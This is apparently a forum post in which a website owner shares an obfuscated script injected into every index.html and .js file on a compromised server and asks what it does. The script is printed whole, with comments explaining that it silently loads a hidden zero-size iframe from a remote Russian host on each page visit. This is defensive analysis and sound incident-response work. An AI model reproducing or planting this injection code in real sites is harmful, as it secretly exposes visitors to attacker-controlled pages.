Found a dodgy script

One of my websites seems to have been compromised as I've found a script added on to all the index.html files and .js files on the server. I'm just wondering if anyone could tell me what it has been doing to my visitors?

// Injected loader script, annotated for analysis; the code itself is left exactly as found.
// Effect on a visitor: once the page has a body, the script appends a <div> and, inside it,
// a 0x0 (invisible) <iframe> whose src is the remote URL assembled below, so the browser
// silently requests that page on every visit. What the remote page serves is not visible
// in this sample.
// The .replace() calls only strip filler characters so that the words "height", "width"
// and "iframe" do not appear literally in the file.
// NOTE(review): the identifiers look randomly generated, so they may differ between
// infected files; confirm before using them as search strings during cleanup.
try{
// Handle of the polling timer started at the bottom of the script.
var J3mbi4ltd;
// Timer callback, invoked every 300 ms until the check below passes.
function Pyyq9ov11b(){

// Stop polling once typeof document.body is 'object'; otherwise return and wait for the next tick.
if (typeof(document.body) == 'object'){
clearInterval(J3mbi4ltd);
}else{
return true;
}
// Assigned but never read again in this sample.
Rep44jigd = '';
// Attribute names after the filler is removed: ['src', 'height', 'width'].
B7cl93owbrfi = ['src','h~e0i0gfhRtf'.replace(/[f~C0R]/g, ''), 'wLiEdEt!h!'.replace(/[\!EL\{J]/g, '')];
// Thin wrapper around element.setAttribute(name, value).
function Bl888ybmj(F4oyjug6eigg1,Wrf63p68pox7v,G5cufufhvjk){
return F4oyjug6eigg1.setAttribute(Wrf63p68pox7v,G5cufufhvjk);
}
// Thin wrapper around document.createElement(tag).
function A511zkc(Fapg082uia){
return document.createElement(Fapg082uia);
}
// Tag name of the element to create; defaults to 'p'.
Natxpwnvsr = 'p';
// Number of frames already present in the window; also sent to the remote server in the URL below.
X0rkknejal = window.frames.length;
// With fewer than 20 frames the tag becomes 'iframe' (decoded from the filler string);
// with 20 or more it stays 'p', in which case no remote page is loaded.
if (X0rkknejal<20) Natxpwnvsr = 'iEf:r/a+m/e:'.replace(/[\:\>E\+/]/g, '');
// The next two values are not read anywhere else in this sample.
// NOTE(review): 'GB' may be a country tag and the number an id added when the script was generated; cannot tell from here.
A58okcuvi380 = 'GB';
Gsseqkv3wyv7 = '1544444201';
// Remote URL used as the frame source (indicator: hxxp://chaoticice[.]ru:8080/index.php).
// The frame count is appended as the value of the last query parameter.
Gpshvjo37oi = 'http://chaoticice.ru:8080/index.php?Xlzk1egit4zn1=1&pid=1&Xlzk1egit4zn1='+X0rkknejal;
// Starts at 1093499169; the subtraction a few lines below (546749584.5*2) brings it to 0.
// That 0 is later used as both the height and the width of the frame.
H3plh7ewi5w = 1093499169;
// Container <div> with a fixed id/name so it can be looked up again further down.
Xudx56rxyt4 = A511zkc('div');
Xudx56rxyt4.id = 'S3whhtlqt';
Xudx56rxyt4.name = 'S3whhtlqt';
// 546749584.5*2 equals 1093499169, so the variable is now 0.
H3plh7ewi5w -= 546749584.5*2;
// Attach the container to the page.
document.body.appendChild(Xudx56rxyt4);
// A string holding a variable name; not read again in this sample.
Bv18u7lzq = 'H3plh7ewi5w';
// Attribute values, in the same order as the names above: [URL, 0, 0].
Vdqv0ucv = new Array(Gpshvjo37oi, H3plh7ewi5w,H3plh7ewi5w);
// Create the element: an <iframe>, or a <p> when the frame-count check above did not pass.
Ey3k2lj1 = document.createElement(Natxpwnvsr);
// for...in walks the array indexes, pairing each attribute name with its value:
// src = remote URL, height = 0, width = 0.
for (Lh82mv6xml in B7cl93owbrfi){
Bl888ybmj(Ey3k2lj1,B7cl93owbrfi[Lh82mv6xml], Vdqv0ucv[Lh82mv6xml]);
}
// Insert the element into the container; for an <iframe> this is the point where the browser loads the remote URL.
document.getElementById('S3whhtlqt').appendChild(Ey3k2lj1);
}

// Run the callback every 300 ms (the string '300' is converted to a number).
J3mbi4ltd = window.setInterval(Pyyq9ov11b, '300');


// Any error raised while setting up is discarded silently, so nothing is reported to the visitor.
}catch(Q9stx2c4myphm){}
 
There *was* a backup of a phpBB forum in a random folder.. but it wasn't set up with a database so I'm not sure if that's still exploitable. Deleted it now anyway :)
 